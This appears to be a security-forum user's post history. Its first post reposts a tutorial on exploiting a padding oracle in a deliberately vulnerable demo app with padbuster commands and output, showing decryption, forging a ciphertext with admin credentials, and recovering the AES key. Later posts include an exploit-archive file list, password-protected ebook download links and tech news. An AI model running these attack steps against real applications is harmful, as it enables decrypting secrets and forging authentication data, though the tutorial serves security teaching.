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Everything posted by Fi8sVrs

  1. I wanted to share some practical tricks on exploiting a padding oracle vulnerability. This type of vulnerability allows an attacker to decrypt ciphertexts and encrypt plaintexts. More information on what the padding oracle attack is and how it works can be found in a previous blog post by Brian Holyfield. The example app used for this blog post has additional flaws that allow recovery of the encryption key. We will use padbuster to run a padding oracle attack and see how the python-paddingoracle library can be used to create a custom exploit tool. You can find the vulnerable example app on GitHub. The application decrypts a request parameter named ‘cipher’. # curl decrypted: ApplicationUsername=user&Password=sesame We know that AES-128 with PKCS#5 padding and the same static password for both the encryption key and initialisation vector are used to encrypt and decrypt this value. There is no HMAC or other message integrity check. Simple padding oracle scenario The keywords PKCS#5 and no MAC indicate that the application might be vulnerable to a padding oracle attack. By flipping bits in the first block we can verify that there are no syntax checks performed on the decrypted data. And we can see that the app happily processes the garbage data in the first block: # curl decrypted: ?+?]7N?d?????N?me=user&Password=sesame The next step is to check how the application reacts to incorrect padding. We can do this by flipping bits in the last block. It appears that the application returns ‘decryption error’ when the padding is incorrect. # curl decryption error Now that we know that the application is vulnerable we can run padbuster to exploit it. I highly recommend reading Brian’s padbuster blog post and looking at the help output, but for convenience you can find the padbuster synopsis below: padbuster URL EncryptedSample BlockSize [options] In this scenario running padbuster is straightforward: The block size is 16 (16 bytes = 128 bits) and the only additional switch we need for now is -encoding 1 (lower case HEX). # padbuster "" "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" 16 -encoding 1 +-------------------------------------------+ | PadBuster - v0.3.3 | | Brian Holyfield - Gotham Digital Science | | labs@gdssecurity.com | +-------------------------------------------+ INFO: The original request returned the following [+] Status: 200 [+] Location: N/A [+] Content Length: 51 INFO: Starting PadBuster Decrypt Mode *** Starting Block 1 of 2 *** INFO: No error string was provided...starting response analysis *** Response Analysis Complete *** The following response signatures were returned: ------------------------------------------------------- ID# Freq Status Length Location ------------------------------------------------------- 1 1 200 42 N/A 2 ** 255 200 16 N/A ------------------------------------------------------- Enter an ID that matches the error condition NOTE: The ID# marked with ** is recommended : 2 Continuing test with selection 2 [+] Success: (24/256) [Byte 16] [+] Success: (165/256) [Byte 15] [snip] Block 1 Results: [+] Cipher Text (HEX): c59ca16e1f3645ef53cc6a4d9d87308e [+] Intermediate Bytes (HEX): 2926e03c56d32edd338ffa923df059e9 [+] Plain Text: ame=user&Passwor *** Starting Block 2 of 2 *** [snip] ------------------------------------------------------- ** Finished *** [+] Decrypted value (ASCII): ame=user&Password=sesame [snip] Note that it was not possible possible to recover the first block. Looking at the block diagram for CBC decryption below helps to understand why. By leveraging the padding oracle it would be possible to obtain the intermediate value after decrypting the first block (-noiv option in padbuster). However, we don’t know the IV to calculate the plaintext for the first block. Attentive readers might have realised already that knowing the plaintext allows us to calculate the IV, which is used as the encryption key. This is explained in more detail further down. To save time we could also specify the error string for invalid padding: -error “decryption error” A more complicated example Now let’s look at a slightly more complicated scenario: The application does not return a dedicated error message for incorrect padding. Instead, the application parses the fields in the decrypted data and returns an error message if a required field is missing. In this case the required fields are ‘ApplicationUsername’ and ‘Password’. Here is an example for a successful request: The ‘cipher’ parameter decrypts successfully and contains all required fields. The application responds with the decrypted value and all parsed fields. # curl decrypted: ApplicationUsername=user&Password=sesame parsed: {'Password': ['sesame'], 'ApplicationUsername': ['user']} If we send a request that only contains a ‘Password’ field the application responds with ‘ApplicationUsername missing’. # curl decrypted: Password=sesame # curl ApplicationUsername missing In the case where the crypt value only contains an ‘ApplicationUsername’ field the application responds with ‘Password missing’. # curl decrypted: ApplicationUsername=user # curl Password missing When tampering with the last block the padding becomes invalid. As a result the application is not able to decrypt the ‘cipher’ parameter and returns ‘ApplicationUsername missing’. # curl ApplicationUsername missing Unfortunately, launching padbuster with minimal options fails: When it attempts to brute force the first block it always encounters the same error message (ApplicationUsername missing). # padbuster "" "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" 16 -encoding 1 [snip] ERROR: All of the responses were identical. Double check the Block Size and try again. But we can still leverage the order the application checks for the fields: It also returns ‘ApplicationUsername missing’ if the padding is invalid. We only need to prepend encrypted data that contains the ‘ApplicationUsername’ field: If the padding is correct then we get a different response. This way we can decrypt all but the first block. In the example below the first two blocks of the ciphertext are prepended when performing the padding oracle attack. This is because the ‘ApplicationUsername’ field spans over two blocks (see Appendix). # padbuster "" "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e" +-------------------------------------------+ | PadBuster - v0.3.3 | | Brian Holyfield - Gotham Digital Science | | labs@gdssecurity.com | +-------------------------------------------+ INFO: The original request returned the following [+] Status: 200 [+] Location: N/A [+] Content Length: 117 INFO: Starting PadBuster Decrypt Mode *** Starting Block 1 of 2 *** [snip] ------------------------------------------------------- ** Finished *** [+] Decrypted value (ASCII): ame=user&Password=sesame [snip] Encrypt We can also encrypt arbitrary content (Please refer to the original padbuster blog post on how this works behind the scenes). The only restriction is that it is not possible to control the first block. This is due to the static IV being used. The application would still accept the resulting ciphertext if we terminate the uncontrollable data of the first block with ‘=bla&’. Note that the crafted ciphertext does not have to have the same length as the original one. # padbuster "" "484b850123a04baf15df9be14e87369b" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e" -plaintext "=bla&ApplicationUsername=admin&Password=admin" [snip] [+] Encrypted value is: 753e2047e19bf24866ae5634f3454ef3a3802d5144a051a7246762f57a16f73531d76ada52422e176ea07e45384df69d00000000000000000000000000000000 ------------------------------------------------------- # curl decrypted: ??_c?I?B?C???=bla&ApplicationUsername=admin&Password=admin parsed: {'\xf7\xc1_c\x9e\x1cI\x9aB\xccC\x10\xac\x07\x90\x97': ['bla'], 'Password': ['admin'], 'ApplicationUsername': ['admin']} Obtaining the key Being able to decrypt and craft the ‘cipher’ parameter would be bad enough, but setting the IV to the encryption key introduces another vulnerability: The IV (and therefore the encryption key) is the plain text of the first block XORed with the intermediate value from decrypting the first block (see block diagram below). We can assume that an attacker could guess the plain text based on the specification, and the decrypted part from the padding oracle attack or messages displayed by the application. Using padbuster’s -noiv switch we are able to get the intermediate value after decrypting the first block: # padbuster "" "484b850123a04baf15df9be14e87369b" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e" -noiv [snip] Block 1 Results: [+] Cipher Text (HEX): 484b850123a04baf15df9be14e87369b [+] Intermediate Bytes (HEX): 7141425f5d56574351562f1730213728 [snip] Once we have obtained the intermediate value we can XOR it with the plaintext to obtain the encryption key: 0x4170706c69636174696f6e557365726e (plaintext ‘ApplicationUsern’) XOR 0x7141425f5d56574351562f1730213728 (intermediate value) = 0x30313233343536373839414243444546 (key ‘0123456789ABCDEF’) Custom Python script The python-paddingoracle library allows us to create a custom exploit tool for situations where padbuster is not flexible enough. For example, when the target application uses CSRF tokens or when testing web services. Two Python scripts that exploit our example web application can be found on GitHub. The first script ‘http-simple.py’ is targeted for the straightforward scenario. Exploiting the more advanced scenario, which requires a prefixed ciphertext has been implemented in ‘http-advanced.py’. This script also demonstrates how to encrypt a plaintext and calculate the key. A few additional notes The Bit flipper payload in the Intruder module of the Burp Proxy is great to see how an application handles encrypted values. You should get suspicious if it accepts some tampered payloads or returns different error messages. This would usually happen if there is no MAC. Encryption without MAC should be considered a finding regardless of any padding oracle. Because of the way CBC works we can always tamper with encrypted values. Prepending another ciphertext in padbuster can come in handy in other situations as well: The application could have an id within the encrypted fields to detect tampering (similar to a nonce). By prepending a mangled block we can stop the application from recognising the id for the current cipher field. For the sake of convenience the sample app also has a feature to encrypt arbitrary data: # curl crypted: 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6 Appendix: Ciphertext blocks Block 1: 484b850123a04baf15df9be14e87369b ApplicationUsern Block 2: c59ca16e1f3645ef53cc6a4d9d87308e ame=user&Passwor Block 3: d2382fb0a54f3a2954bfebe0a04dd4d6 d=sesame[padding] Source: http://blog.gdssecurity.com/labs/2015/10/26/exploiting-padding-oracle-to-gain-encryption-keys.html
  2. DevOpsDays DC 2015 - 30 - DevOops & How I hacked you - Chris Gates, Facebook & Ken Johnson, nVisium In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure. Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment. https://vimeo.com/137691444
  3. @wildchild am pus acum si link de download, scuze https://www.sendspace.com/file/iwp2ys rstforums.com
  4. Introduction to Network Security: Theory and Practice Authors: JIE WANG, ZACHARY CHISSEL Read: https://www.scribd.com/doc/288343834/Introduction-to-Network-Security-Theory-and-Practice-2nd-Edition Download: https://www.sendspace.com/file/iwp2ys pwd: rstforums.com
  5. Hi everyone, We are very excited to announce that Vivaldi Beta is released for download today. With the first technical preview launch back in January this year, we set out to develop a web browser that was fast, powerful and customizable, for power users around the world. After 50 snapshots and 4 Technical previews, Vivaldi has now reached Beta. We cannot thank you enough for all the support we have gotten from our community. We couldn't have done it without you. Special thanks goes to the Sopranos (our volunteer test team) for always being willing to test our internal builds and give us valuable feedback. Download Vivaldi Beta from here and spread the word for us. Share this with your friends and co-workers through Twitter and Facebook and get them as excited about this awesome browser as we are. We will continues to work hard, so expect more features and bug fixes coming before the final release. As always, we love to hear from you. Post your feedback on our forums or below. For those of you following our previous TPs, here is the feature history overview. Feature additions since the first technology preview TP1 (released on 27.01.2015) Tab stacking Notes Speed Dial Bookmarks manager Downloads manager Quick commands Mouse gestures Page actions Sidebar Colored tabs Visual tabs Recently closed tabs Shortcuts TP2 (released on 05.03.2015) Bookmarks bar On-demand image loading Fast/Forward Spatial navigation TP3 (release on 28.04.2015) Tab Stack Tiling Unseen page marker Native window Autoupdate Personal data importing Plug-ins on demand Background tabs loading indicator TP4 (release on 16.07.2015) Startup options Color schemes UI zoom HiDPI support Pinned tabs Task manager Beta 1 (released on 03.11.2015) Web-panels Chromeless UI Tabs visual navigation Private window Page loading progress indicator Typed history list Smooth scrolling Geolocation support HTML5 h.264 support Full Extensions support All the best, The Vivaldi team Via
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  8. Malware
  9. Fi8sVrs


  10. Salut, are fratele meu mai mic telefon allview pe android si nu reuseste sa instaleze jocuri de pe google store, versiune App Google versiune google play 5.7.10 cand incearca sa instaleze ii afiseaza bara cu loading..., dar nu se deschide aplicatia si nici nu confirma ca a fost instalata cu succes, pur si simplu ramane in stadiul de loading, am incercat cu setting->application->manage->all tab->google play store-> clear data nimic, am restartat telefonul, am scos cartela, nimic... stie cineva o rezolvare? multumesc anticipat
  11. update, Romania 1 mil si ceva... + metoda
  12. Do you hear the same as me? Is Facebook planning to Launch Satellite? Yes, it's True. Facebook has revealed its secret plan to launch a $500 Million Satellite by 2016 in order to provide Free or cheap Internet access in the developing nations. Facebook CEO Mark Zuckerberg made an announcement that the social network partnered with French satellite provider Eutelsat Communications to beam free Internet to several countries in Sub-Saharan Africa. Internet-by-Satellite The plan is part of Facebook's Internet.org project that has been criticized for net neutrality issues in some countries, particularly India, where businesses believes that the plans could give Facebook and its partners unfair benefits in developing Internet markets. Facebook has been exploring ways to provide the Internet to hard-to-reach places and this latest initiative to use Satellite technology for providing affordable Internet is part of the Facebook initiative to connect the world. AMOS-6 Satellite to Launch by 2016 Facebook and Eutelsat will work with Spacecom to utilize its entire broadband payload on the AMOS-6 (geostationary) satellite, which is expected to launch in 2016. Along with gateways and terminals on the ground, AMOS-6 will provide high gain spot beams of data that will cover large parts of West, East and Southern Africa. Interestingly, the AMOS-6 satellite is to be lofted into the sky using Elon Musk SpaceX's Falcon 9 rocket. Facebook is Looking Beyond the Planet Several companies already provide Internet access through satellite, but it is likely a costly option out of the reach of most people in the developing countries. Internet-by-satellite is not, of course, Facebook's only plan of action for providing cheap Internet to remote areas. The social network giant is also working on giant drones for offering the Internet, but that technology has just begun being tested in the real world. Via
  13. Iran's nuclear enrichment systems were hit by the Stuxnet virus that targeted centrifuges The risk of a "serious cyber attack" on nuclear power plants around the world is growing, warns a report. The civil nuclear infrastructure in most nations is not well prepared to defend against such attacks, it added. Many of the control systems for the infrastructure were "insecure by design" because of their age, it said. Published by the influential Chatham House think tank, the report studied cyber defences in power plants around the world over an 18-month period. Core breach Cyber criminals, state-sponsored hackers and terrorists were all increasing their online activity, it said, meaning that the risk of a significant net-based attack was "ever present". Such an attack on a nuclear plant, even if small-scale or unlikely, needed to be taken seriously because of the harm that would follow if radiation were released. In addition, it said "even a small-scale cyber security incident at a nuclear facility would be likely to have a disproportionate effect on public opinion and the future of the civil nuclear industry". Unfortunately, research carried out for the study showed that the UK's nuclear plants and associated infrastructure were not well protected or prepared because the industry had converted to digital systems relatively recently. This increasing digitisation and growing reliance on commercial software is only increasing the risks the nuclear industry faces. There was a "pervading myth" that computer systems in power plants were isolated from the internet at large and because of this were immune to the kind of cyber attacks that have dogged other industries. However, it said, this so-called "air gap" between the public internet and nuclear systems was easy to breach with "nothing more than a flash drive". It noted that the destructive Stuxnet computer virus infected Iran's nuclear facilities via this route. The story of Stuxnet In 2009, a malicious computer program called 'Stuxnet' was manually uploaded into a nuclear plant in Iran. The worm took control of 1,000 machines involved with producing nuclear materials, and instructed them to self-destruct. What made the world's first cyber-weapon so destructive? The researchers for the report had also found evidence of virtual networks and other links to the public internet on nuclear infrastructure networks. Some of these were forgotten or simply unknown to those in charge of these organisations. Already search engines that sought out critical infrastructure had indexed these links making it easy for attackers to find ways in to networks and control systems. Keith Parker, chief executive of the Nuclear Industry Association, said: "Security, including cyber security, is an absolute priority for power station operators." "All of Britain's power stations are designed with safety in mind and are stress-tested to withstand a vast range of potential incidents," he added. "Power station operators work closely with national agencies such as the Centre for the Protection of National Infrastructure and other intelligence agencies to always be aware of emerging threats." In addition, said Mr Parker, the industry's regulator continuously monitors plant safety to help protect it from any outside threats. In June this year the International Atomic Energy Agency held its first international conference about the cyber threats facing plants and manufacturing facilities. At the conference Yukiya Amano, director of the IAEA, said both random and targeted attacks were being directed at nuclear plants. "Staff responsible for nuclear security should know how to repel cyber-attacks and to limit the damage if systems are actually penetrated," he said in a keynote address to the conference. The civil nuclear industry should do a better job of measuring cyber attack risks and improve the way it defends against them, according to Chatham House. Many plants examined by the report's researchers lacked preparedness for large-scale attacks that took place outside office hours. "The nuclear industry is beginning - but struggling - to come to grips with this new, insidious threat," said Patricia Lewis, research director of Chatham House's international security programme. Via
  14. Distro Checker is a tool written for doing cross distribution exploit testing. More information Downlaod https://packetstormsecurity.com/files/133871/Distro-Checker-1.0.1.html
  15. https://www.sendspace.com/file/g2nwkl pwd: rstforums.com
  16. This archive contains 191 exploits that were added to Packet Storm in September, 2015. Content: 09/26/2015 02:01 AM 2,574 4images1711-xss.txt 09/21/2015 05:22 AM 4,520 adhweb-bypass.txt 09/07/2015 05:33 PM 5,512 advantechwebaccess-exec.txt 09/16/2015 06:22 PM 4,550 anchorcms092-xssredirect.txt 09/10/2015 03:14 AM 15,023 androidstagefright-exec.txt 09/14/2015 04:33 PM 3,146 AS-CP_IKEVIEW-0911.txt 09/25/2015 10:00 AM 3,466 AS-FORTIMANAGER-XSS-0924.txt 09/26/2015 05:44 PM 3,874 AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt 09/15/2015 01:22 AM 3,370 AS-IKEVIEWR60-0914.txt.txt 09/06/2015 10:32 PM 2,928 AS-JSPMYSQLADMINISTRADOR-0904.txt 09/14/2015 05:44 PM 2,903 AS-MONSTAFTP-0911.txt 09/15/2015 01:22 AM 3,095 AS-OPENFIRE-CSRF.txt 09/15/2015 09:05 AM 2,190 AS-OPENFIRE-FILE-UPLOAD.txt 09/15/2015 09:03 AM 2,164 AS-OPENFIRE-PRIV-ESCALATION.txt 09/15/2015 09:04 AM 2,701 AS-OPENFIRE-RFI.txt 09/15/2015 09:01 AM 3,116 AS-OPENFIRE-XSS.txt 09/07/2015 05:05 PM 4,129 autocad-overflow.txt 09/09/2015 05:17 AM 1,892 autoexchanger-xsrf.txt 09/28/2015 11:48 PM 781 bisonftp_dir_trav.py.txt 09/15/2015 08:00 AM 5,634 bolt_file_upload.rb.txt 09/04/2015 03:55 AM 4,474 bypassuac_vbs.rb.txt 09/02/2015 06:50 PM 4,338 cerb-xsrf.txt 09/23/2015 06:22 AM 6,198 ciscoanyconnect-escalate.tgz 09/24/2015 04:45 AM 169,399 ciscoanyconnectdmg-escalate.txt 09/28/2015 11:15 PM 1,128 collabtive20-shell.txt 09/12/2015 03:12 PM 2,104 cubecart-bypass.txt 09/26/2015 02:02 AM 2,626 CVE-2015-7323.txt 09/09/2015 03:33 AM 5,223 directadmin-xssxsrf.txt 09/08/2015 07:44 AM 791 disconnectme-escalate.txt 09/17/2015 02:47 AM 584,490 dotnet-mvc-redos-cve2015-2526-ms15-101-malerisch.pdf 09/02/2015 05:44 PM 4,076 edimaxbr-xssxsrfsplit.txt 09/07/2015 07:26 PM 5,890 efw_chpasswd_exec.rb.txt 09/10/2015 03:11 AM 6,537 ERPSCAN-15-014.txt 09/10/2015 03:00 AM 6,302 ERPSCAN-15-015.txt 09/10/2015 03:00 AM 6,527 ERPSCAN-15-016.txt 09/18/2015 05:44 PM 1,437 farol-sql.txt 09/07/2015 07:23 PM 1,989 fireeye-disclose.txt 09/07/2015 11:22 PM 2,426 gmpunserialize-uaf.txt 09/03/2015 06:55 PM 1,265 gpon-xsrf.txt 09/14/2015 06:55 PM 4,469 GS20150915052102.tgz 09/14/2015 05:44 PM 3,505 GS20150915052344.tgz 09/14/2015 11:02 PM 3,821 GS20150915052600.tgz 09/18/2015 01:11 PM 1,938 GS20150919145459.tgz 09/18/2015 12:22 PM 4,175,584 GS20150919145515.tgz 09/18/2015 02:33 PM 70,978 GS20150919145732.tgz 09/18/2015 03:12 PM 63,903 GS20150919145908.tgz 09/19/2015 01:22 AM 1,266 GS20150919150006.tgz 09/18/2015 11:22 PM 65,726 GS20150919150144.tgz 09/18/2015 08:22 PM 43,648 GS20150919150228.tgz 09/18/2015 06:55 PM 1,182,387 GS20150919150336.tgz 09/18/2015 06:55 PM 453,053 GS20150919150449.tgz 09/18/2015 07:22 PM 65,705 GS20150919150941.tgz 09/18/2015 11:22 PM 56,317 GS20150919151127.tgz 09/22/2015 05:02 PM 3,231 GS20150923050903.tgz 09/22/2015 06:55 PM 4,776 GS20150923051101.tgz 09/22/2015 06:55 PM 2,786 GS20150923051223.tgz 09/22/2015 07:22 PM 6,975 GS20150923051317.tgz 09/22/2015 06:02 PM 102,558 GS20150923051455.tgz 09/22/2015 06:02 PM 235,539 GS20150923051616.tgz 09/22/2015 02:11 PM 4,835 GS20150923051755.tgz 09/22/2015 05:04 PM 4,356 GS20150923051911.tgz 09/22/2015 09:22 PM 6,063 GS20150923052025.tgz 09/22/2015 07:20 PM 3,937 GS20150923052141.tgz 09/22/2015 10:22 PM 4,670 GS20150923052244.tgz 09/22/2015 01:44 PM 3,670 GS20150923052359.tgz 09/23/2015 06:33 AM 5,563 GS20150923052556.tgz 09/23/2015 03:02 AM 4,583 GS20150923052733.tgz 09/23/2015 06:02 AM 903 GS20150923053511.tgz 09/22/2015 04:11 AM 1,135 GS20150923053636.tgz 09/23/2015 03:33 AM 3,724 GS20150923053958.tgz 09/23/2015 03:05 AM 4,039 GS20150923054638.tgz 09/23/2015 07:22 PM 3,735 GS20150923054846.tgz 09/23/2015 06:51 PM 3,453 GS20150923155121.tgz 09/24/2015 03:00 AM 3,699 GS20150924014637.tgz 09/28/2015 11:44 PM 53,509 GS20150928204418.tgz 09/28/2015 11:51 PM 5,344 GS20150928205154.tgz 09/07/2015 06:55 PM 3,233 hootoo-xsrf.txt 09/09/2015 02:33 AM 558 ibmaixhacmp-escalate.txt 09/18/2015 01:11 PM 4,765 ibookingcms-sql.txt 09/21/2015 03:51 AM 1,640 intelbraswrn-dnschange.txt 09/23/2015 06:59 PM 3,439 itop-xss.txt 09/21/2015 05:44 PM 1,354 jasigcas401-xss.txt 09/27/2015 10:22 PM 40,757 jsproxy_crypto-master.zip 09/30/2015 07:13 AM 5,392 kaseyavsa-execescalate.txt 09/16/2015 09:32 PM 6,144 kirbycms21-bypasstraversal.txt 09/16/2015 06:55 PM 6,697 kirbycms210-xsrfexec.txt 09/14/2015 04:02 PM 2,667 KIS-2015-04.txt 09/19/2015 06:40 PM 10,593 KL-001-2015-005.txt 09/19/2015 06:45 PM 2,152 kmftp_utility_cwd.rb.txt 09/16/2015 05:44 PM 3,510 manageengine-sql.txt 09/16/2015 04:33 PM 3,272 manageengineopmanager-default.txt 09/28/2015 11:46 PM 7,212 manageengine_eventlog_analyzer_rce.rb.txt 09/17/2015 08:06 AM 5,889 manage_engine_opmanager_rce.rb.txt 09/04/2015 03:02 AM 820 milw0rm-xss.txt 09/30/2015 07:08 AM 3,443 mitsubishimelsec-dos.txt 09/17/2015 08:03 AM 16,834 ms15_078_atmfd_bof.rb.txt 09/15/2015 08:01 AM 1,924 ms15_100_mcl_exe.rb.txt 09/26/2015 03:02 AM 8,286 MZ-15-03-GOOD-Auth-Delegation.txt 09/07/2015 07:20 PM 3,483 netgearwms-bypassescalate.txt 09/01/2015 06:55 PM 2,972 nibbleblog403-exec.txt 09/01/2015 03:22 PM 1,614 nibbleblog403-xsrf.txt 09/13/2015 06:33 AM 1,929 nokiasolutions-xss.txt 09/10/2015 10:32 PM 2,313 NS-15-014.txt 09/04/2015 03:22 AM 1,185 opendocman132-xss.txt 09/14/2015 02:11 PM 5,804 openldap-dos.txt 09/29/2015 04:11 AM 753 pcman_dir_traversal.py.txt 09/18/2015 01:11 PM 2,958 pentaho-disclose.txt 09/07/2015 07:55 AM 2,162 poc_pointer_dynamic_vul.c 09/28/2015 11:35 PM 774 Projeqtor_FileUpload.txt 09/09/2015 05:18 AM 3,407 qlikview-xxe.txt 09/10/2015 05:44 PM 1,029 raritanpoweriq-default.txt 09/04/2015 03:57 AM 6,878 registry_persistence.rb.txt 09/21/2015 03:11 PM 1,221 sapnetweaver-xxe.txt 09/01/2015 06:40 PM 6,480 serendipity201-shell.txt 09/01/2015 10:32 PM 3,457 serendipity201-sql.txt 09/01/2015 11:02 PM 2,397 serendipity201-xss.txt 09/07/2015 09:22 PM 2,838 sessiondeserializer-uaf.txt 09/22/2015 01:11 PM 6,076 shadowinfosystem-disclose.txt 09/14/2015 01:22 PM 8,712 silverpeak-exec.txt 09/25/2015 02:55 AM 6,935 smf_rme_exploit.py.txt 09/02/2015 08:55 AM 542 sphereftp2-poc.txt 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  22. Windows Malware Analysis Essentials Master the fundamentals of malware analysis for the Windows platform and enhance your anti-malware skill set Author: Victor Marak Read: https://www.scribd.com/doc/283049338/Windows-Malware-Analysis-Essentials Download: https://www.sendspace.com/file/rbwzjv
  23. Yahoo! has open-sourced Gryffin – a Web Application Security Scanner – in an aim to improve the safety of the Web for everyone. Currently in its beta, Project Gryffin has made available on Github under the BSD-style license that Yahoo! has been using for a number of its open-sourced projects. Gryffin is basically a Go & JavaScript platform that helps system administrators scan URLs for malicious web content and common security vulnerabilities, including SQL Injection and Cross-Site Scripting (XSS). Yahoo! describes Gryffin as a large-scale Web security scanning platform, which is more than just a scanner, as it is designed to address two specific problems: Coverage Scale Scale is obviously implied for large Web, while Coverage has two dimensions –Crawl and Fuzzing. Crawl's ability is to find as much of the Web application's footprint as possible, whereas Fuzzing involves testing each part of the application's components for an applied set of vulnerabilities. Gryffin's Crawler is designed to search "millions of URLs" that might be driven by a single template from just one of the URLs to work. Moreover, the crawler also includes a de-duplication engine for comparing a new page with an existing one and thus allowing it to avoid crawling the same page twice. Gryffin's Crawler also has PhantomJS, which is used to handle DOM rendering in client-side JavaScript applications. Gryffin's Requirements The requirements for Gryffin are as listed below: Go PhantomJS v2 The NSQ distributed messaging system Sqlmap for fuzzing SQL injection Arachni for fuzzing XSS and Web vulnerabilities Kibana and Elastic Search for dashboarding Besides Yahoo!, many major companies have released their own web application vulnerability scanners to make Internet experience safe for users. Back in February, Google released its own free web application vulnerability scanner tool, dubbed Google Cloud Security Scanner, which potentially scans developers' applications for common security vulnerabilities on its cloud platform more effectively. Source
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  24. @tqcsu am pus mirror, merci
  25. Big Data Forensics Learning Hadoop Investigations Perform forensic investigations on Hadoop clusters with cutting-edge tools and techniques Author: Joe Sremack Read: https://www.scribd.com/doc/282784577/Big-Data-Forensics-Learning-Hadoop-Investigations Download: http://rghost.net/7wHPKHVMk Mirror: https://www.sendspace.com/file/372r37
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